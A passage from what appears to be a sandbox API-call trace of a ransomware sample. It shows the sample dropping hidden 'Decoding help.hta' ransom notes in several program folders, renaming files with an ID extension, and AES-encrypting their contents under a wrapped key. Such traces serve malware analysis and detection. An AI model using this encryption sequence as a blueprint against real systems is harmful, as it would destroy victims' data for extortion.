Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0057.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.474] FindNextFileW (in: hFindFile=0x671ef0, lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1afc00, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x5a1afc00, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x5a1afc00, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0057.475] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0057.475] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 122 [0057.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0057.475] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0x1 [0057.475] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeMinimum_x64.msi") returned -1 [0057.475] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0057.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0057.475] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 122 [0057.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0057.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0057.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0057.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 734 os_tid = 0xfc0 [0054.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*", lpFindFileData=0x1010fd30 | out: lpFindFileData=0x1010fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db678 [0056.859] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.859] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x1010fd30 | out: lpFindFileData=0x1010fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.860] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.860] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.860] FindNextFileW (in: hFindFile=0x5db678, lpFindFileData=0x1010fd30 | out: lpFindFileData=0x1010fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0056.860] lstrcpyW (in: lpString1=0x244e0188, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*" [0056.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*") returned 64 [0056.860] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Decoding help.hta" [0056.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\decoding help.hta")) returned 0xffffffff [0056.860] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x490 [0059.033] WriteFile (in: hFile=0x490, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1010fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1010fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.501] CloseHandle (hObject=0x490) returned 1 [0061.601] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 735 os_tid = 0xfc4 [0054.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*", lpFindFileData=0x133dfd30 | out: lpFindFileData=0x133dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5f30 [0056.141] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.141] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x133dfd30 | out: lpFindFileData=0x133dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.141] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.141] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.141] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x133dfd30 | out: lpFindFileData=0x133dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.590] lstrcpyW (in: lpString1=0x10f372a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*" [0056.590] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*") returned 63 [0056.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Decoding help.hta" [0056.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\decoding help.hta")) returned 0xffffffff [0056.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9e0 [0058.038] WriteFile (in: hFile=0x9e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x133dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x133dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.039] CloseHandle (hObject=0x9e0) returned 1 [0058.039] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.039] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.039] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.039] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*" [0058.039] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*.*") returned 63 [0058.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" [0058.039] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" [0058.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9e0 [0058.040] CreateFileMappingA (hFile=0x9e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9e4 [0058.040] CryptAcquireContextA (in: phProv=0x133dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x133dfcec*=0x3448e90) returned 1 [0060.172] CryptGenKey (in: hProv=0x3448e90, Algid=0x6610, dwFlags=0x1, phKey=0x133dfce8 | out: phKey=0x133dfce8*=0x42cf158) returned 1 [0060.172] CryptExportKey (in: hKey=0x42cf158, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x133dfbe4, pdwDataLen=0x133dfce4 | out: pbData=0x133dfbe4*, pdwDataLen=0x133dfce4*=0x2c) returned 1 [0060.173] MapViewOfFile (hFileMappingObject=0x9e4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x3270000 [0063.796] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x133dfbe4*, pdwDataLen=0x133dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x133dfbe4*, pdwDataLen=0x133dfcf8*=0x100) returned 1 [0063.797] CryptEncrypt (in: hKey=0x42cf158, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3270000*, pdwDataLen=0x133dfce4*=0x140, dwBufLen=0x140 | out: pbData=0x3270000*, pdwDataLen=0x133dfce4*=0x140) returned 1 [0063.798] UnmapViewOfFile (lpBaseAddress=0x3270000) Thread: id = 736 os_tid = 0xfc8 [0054.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*", lpFindFileData=0x1371fd30 | out: lpFindFileData=0x1371fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc9d8 [0059.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.405] FindNextFileW (in: hFindFile=0x10fbc9d8, lpFindFileData=0x1371fd30 | out: lpFindFileData=0x1371fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.405] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.405] FindNextFileW (in: hFindFile=0x10fbc9d8, lpFindFileData=0x1371fd30 | out: lpFindFileData=0x1371fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.405] lstrcpyW (in: lpString1=0x11334308, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*" [0059.405] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*") returned 64 [0059.405] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Decoding help.hta" [0059.405] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\decoding help.hta")) returned 0xffffffff [0059.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.662] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1371fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1371fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.663] CloseHandle (hObject=0x4bc) returned 1 [0060.663] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.880] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.880] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.880] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*" [0060.880] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*") returned 64 [0060.880] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" [0060.880] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" [0060.880] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.881] FindNextFileW (in: hFindFile=0x10fbc9d8, lpFindFileData=0x1371fd30 | out: lpFindFileData=0x1371fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.881] FindClose (in: hFindFile=0x10fbc9d8 | 